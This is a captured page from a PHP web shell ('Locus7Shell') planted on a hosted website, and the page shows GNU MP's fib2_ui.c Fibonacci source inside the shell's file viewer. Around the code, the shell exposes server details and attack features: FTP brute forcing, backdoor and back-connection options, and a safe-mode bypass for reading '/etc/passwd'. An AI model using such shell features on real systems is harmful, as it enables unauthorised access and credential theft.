Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gmp-6.2.1/mpn/generic/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     fib2_ui.c (5.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* mpn_fib2_ui -- calculate Fibonacci numbers.

   THE FUNCTIONS IN THIS FILE ARE FOR INTERNAL USE ONLY.  THEY'RE ALMOST
   CERTAIN TO BE SUBJECT TO INCOMPATIBLE CHANGES OR DISAPPEAR COMPLETELY IN
   FUTURE GNU MP RELEASES.

Copyright 2001, 2002, 2005, 2009, 2018 Free Software Foundation, Inc.

This file is part of the GNU MP Library.

The GNU MP Library is free software; you can redistribute it and/or modify
it under the terms of either:

  * the GNU Lesser General Public License as published by the Free
    Software Foundation; either version 3 of the License, or (at your
    option) any later version.

or

  * the GNU General Public License as published by the Free Software
    Foundation; either version 2 of the License, or (at your option) any
    later version.

or both in parallel, as here.

The GNU MP Library is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License
for more details.

You should have received copies of the GNU General Public License and the
GNU Lesser General Public License along with the GNU MP Library.  If not,
see https://www.gnu.org/licenses/.  */

#include <stdio.h>
#include "gmp-impl.h"

/* change this to "#define TRACE(x) x" for diagnostics */
#define TRACE(x)


/* Store F[n] at fp and F[n-1] at f1p.  fp and f1p should have room for
   MPN_FIB2_SIZE(n) limbs.

   The return value is the actual number of limbs stored, this will be at
   least 1.  fp[size-1] will be non-zero, except when n==0, in which case
   fp[0] is 0 and f1p[0] is 1.  f1p[size-1] can be zero, since F[n-1]<F[n]
   (for n>0).

   Notes: F[2k+1] = 4*F[k]^2 - F[k-1]^2 + 2*(-1)^k.

   In F[2k+1] with k even, +2 is applied to 4*F[k]^2 just by ORing into the
   low limb.

   In F[2k+1] with k odd, -2 is applied to F[k-1]^2 just by ORing into the
   low limb.
*/

mp_size_t
mpn_fib2_ui (mp_ptr fp, mp_ptr f1p, unsigned long int n)
{
  mp_size_t      size;
  unsigned long  nfirst, mask;

  TRACE (printf ("mpn_fib2_ui n=%lu\n", n));

  ASSERT (! MPN_OVERLAP_P (fp, MPN_FIB2_SIZE(n), f1p, MPN_FIB2_SIZE(n)));

  /* Take a starting pair from the table. */
  mask = 1;
  for (nfirst = n; nfirst > FIB_TABLE_LIMIT; nfirst /= 2)
    mask <<= 1;
  TRACE (printf ("nfirst=%lu mask=0x%lX\n", nfirst, mask));

  f1p[0] = FIB_TABLE ((int) nfirst - 1);
  fp[0]  = FIB_TABLE (nfirst);
  size = 1;

  /* Skip to the end if the table lookup gives the final answer. */
  if (mask != 1)
    {
      mp_size_t  alloc;
      mp_ptr        xp;
      TMP_DECL;

      TMP_MARK;
      alloc = MPN_FIB2_SIZE (n);
      xp = TMP_ALLOC_LIMBS (alloc);

      do
    {
      /* Here fp==F[k] and f1p==F[k-1], with k being the bits of n from
         n&mask upwards.

         The next bit of n is n&(mask>>1) and we'll double to the pair
         fp==F[2k],f1p==F[2k-1] or fp==F[2k+1],f1p==F[2k], according as
         that bit is 0 or 1 respectively.  */

      TRACE (printf ("k=%lu mask=0x%lX size=%ld alloc=%ld\n",
             n >> refmpn_count_trailing_zeros(mask),
             mask, size, alloc);
         mpn_trace ("fp ", fp, size);
         mpn_trace ("f1p", f1p, size));

      /* fp normalized, f1p at most one high zero */
      ASSERT (fp[size-1] != 0);
      ASSERT (f1p[size-1] != 0 || f1p[size-2] != 0);

      /* f1p[size-1] might be zero, but this occurs rarely, so it's not
         worth bothering checking for it */
      ASSERT (alloc >= 2*size);
      mpn_sqr (xp, fp,  size);
      mpn_sqr (fp, f1p, size);
      size *= 2;

      /* Shrink if possible.  Since fp was normalized there'll be at
         most one high zero on xp (and if there is then there's one on
         yp too).  */
      ASSERT (xp[size-1] != 0 || fp[size-1] == 0);
      size -= (xp[size-1] == 0);
      ASSERT (xp[size-1] != 0);  /* only one xp high zero */

      /* Calculate F[2k-1] = F[k]^2 + F[k-1]^2. */
      f1p[size] = mpn_add_n (f1p, xp, fp, size);

      /* Calculate F[2k+1] = 4*F[k]^2 - F[k-1]^2 + 2*(-1)^k.
         n&mask is the low bit of our implied k.  */

      ASSERT ((fp[0] & 2) == 0);
      /* fp is F[k-1]^2 == 0 or 1 mod 4, like all squares. */
      fp[0] |= (n & mask ? 2 : 0);            /* possible -2 */
#if HAVE_NATIVE_mpn_rsblsh2_n
      fp[size] = mpn_rsblsh2_n (fp, fp, xp, size);
      MPN_INCR_U(fp, size + 1, (n & mask ? 0 : 2));    /* possible +2 */
#else
      {
        mp_limb_t  c;

        c = mpn_lshift (xp, xp, size, 2);
        xp[0] |= (n & mask ? 0 : 2);    /* possible +2 */
        c -= mpn_sub_n (fp, xp, fp, size);
        fp[size] = c;
      }
#endif
      ASSERT (alloc >= size+1);
      size += (fp[size] != 0);

      /* now n&mask is the new bit of n being considered */
      mask >>= 1;

      /* Calculate F[2k] = F[2k+1] - F[2k-1], replacing the unwanted one of
         F[2k+1] and F[2k-1].  */
      if (n & mask)
        ASSERT_NOCARRY (mpn_sub_n (f1p, fp, f1p, size));
      else {
        ASSERT_NOCARRY (mpn_sub_n ( fp, fp, f1p, size));

        /* Can have a high zero after replacing F[2k+1] with F[2k].
           f1p will have a high zero if fp does. */
        ASSERT (fp[size-1] != 0 || f1p[size-1] == 0);
        size -= (fp[size-1] == 0);
      }
    }
      while (mask != 1);

      TMP_FREE;
    }

  TRACE (printf ("done size=%ld\n", size);
     mpn_trace ("fp ", fp, size);
     mpn_trace ("f1p", f1p, size));

  return size;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0055 ]--